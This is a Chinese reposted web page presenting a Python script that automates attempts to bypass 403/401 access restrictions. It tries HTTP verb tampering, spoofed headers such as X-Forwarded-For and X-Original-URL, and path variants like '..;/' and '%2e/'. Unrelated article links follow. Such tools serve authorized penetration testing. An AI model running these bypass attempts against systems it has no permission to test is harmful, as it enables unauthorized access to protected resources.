当前位置: 首页 > news >正文

一款自动化的403/401绕过测试工具

工具介绍

一款自动化的403/401绕过测试工具,集成了路径规范化、请求头注入及谓词篡改等多种实战技巧。

工具使用

python run.py -u http://xx.com

run.py

import requests import argparse import urllib3 from urllib.parse import urlparse # 忽略 SSL 警告 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class BypassScanner: def __init__(self, target_url): self.target = target_url.rstrip('/') self.path = urlparse(target_url).path self.headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AF-Service-Scanner/1.0" } def scan(self): print(f"[*] Starting Bypass Scan for: {self.target}\n") # 1. 谓词篡改 (Verb Tampering) methods = ["GET", "POST", "HEAD", "PUT", "TRACE", "OPTIONS"] for m in methods: self._request(m, self.target, title=f"Method: {m}") # 2. Header 注入 bypass_headers = [ {"X-Forwarded-For": "127.0.0.1"}, {"X-Custom-IP-Authorization": "127.0.0.1"}, {"X-Original-URL": self.path}, {"X-Rewrite-URL": self.path}, {"X-Remote-IP": "127.0.0.1"}, {"X-Host": "127.0.0.1"} ] for h in bypass_headers: self._request("GET", self.target, headers=h, title=f"Header: {list(h.keys())[0]}") # 3. 路径变形 (Path Fuzzing) # 包含你提到的 ..;/ 和 ../ path_payloads = [ f"{self.target}/", f"{self.target}/.", f"{self.target}..;/", f"{self.target}/..;/", f"{self.target}/%2e/", f"{self.target}//", f"{self.target}.json" ] for p in path_payloads: self._request("GET", p, title=f"Path: {p.replace(self.target, '')}") def _request(self, method, url, headers=None, title=""): test_headers = self.headers.copy() if headers: test_headers.update(headers) try: resp = requests.request(method, url, headers=test_headers, verify=False, timeout=5, allow_redirects=False) color = "\033[92m" if resp.status_code == 200 else "\033[90m" print(f"{color}[{resp.status_code}] {title} \033[0m") except Exception as e: print(f"[!] Error on {title}: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="403/401 Bypass Automation Tool") parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., https://example.com/admin)") args = parser.parse_args() scanner = BypassScanner(args.url) scanner.scan()

工具下载

https://github.com/Adonis-363/403-
http://www.cnnetsun.cn/news/685912.html

相关文章:

  • IP反查工具,能够快速查询指定IP/域名关联的所有网站
  • LLM 推理加速:深入 vLLM 源码,揭秘 PagedAttention 如何让吞吐量提升 20 倍?
  • 【无人机三维路径规划】鸡群算法CSO和自适应双种群协同鸡群算法ADPCCSO复杂山地模型下无人机路径规划【含Matlab源码 14981期】
  • 消除乱码-UTF8字符转换
  • 2026必备!继续教育TOP9AI论文写作软件测评与推荐
  • dify制作的工作流如何通过API调用
  • 强烈安利8个AI论文软件,MBA毕业论文轻松搞定!
  • (6-3)常见类的继承关系
  • (6-4)常见类的继承关系
  • 8大AI学术工具横向评测:写作与降重功能实测,助力高效论文产出
  • 遥感小目标检测难题一次解决:YOLOv8 + RepVGG + QueryDet 实战全指南
  • AI论文工具TOP8:改写+写作功能深度测评
  • 8款AI论文工具大PK:改写与写作功能谁更强?
  • 学长亲荐8个一键生成论文工具,专科生搞定毕业论文!
  • 水下生物水下动物海洋动物检测数据集VOC+YOLO格式9333张10类别
  • AI论文助手功能对比:8款工具写作与降重测评,学术效率提升方案
  • YOLO26创新改进 | 独家创新首发、Neck改进篇 | 来自CVPR 2025 暗光增强 | 引入LCA交叉注意力机制和IEL特征增强模块,助力YOLO26低光,暗光检测高效涨点!
  • YOLO26涨点改进 | 全网独家创新首发、特征融合Neck改进篇 | TGRS 2025一区 | MSAM的魔改YOLO26、焕发前所未有的目标检测能力,提升其对不同尺度物体的检测能力,涨点必备
  • 基于深度学习YOLOv10的红细胞、白细胞和血小板检测系统(YOLOv10+YOLO数据集+UI界面+Python项目源码+模型)
  • 嵌入式存储芯片驱动解析:标准化接口与STM32 FMC配置指南
  • 本科毕业论文流程图制作方法
  • Python+django的教师讲座听课评课管理系统
  • vue3+python的粮油商品交易平台设计与实现
  • NuImages 数据集转 YOLO 格式全攻略|踩过的坑和完整解决方案汇总
  • RK3588实战秘籍:YOLOv5s多线程部署,FPS从16飙升到120,轻量化+性能加速全流程教学
  • YOLOv13结构优化新方案:替换GSConv,轻量化同时mAP狂涨6.56%!
  • YOLOv8融合HAttention深度解析:激活像素级注意力的新范式
  • 为什么YOLOv13要用SKAttention?一文搞懂选择性核注意力的原理与实战效果
  • 2026必备!研究生论文写作TOP8一键生成论文工具测评
  • 课程论文别再凑字数!宏智树 AI 教你高效写出高分范文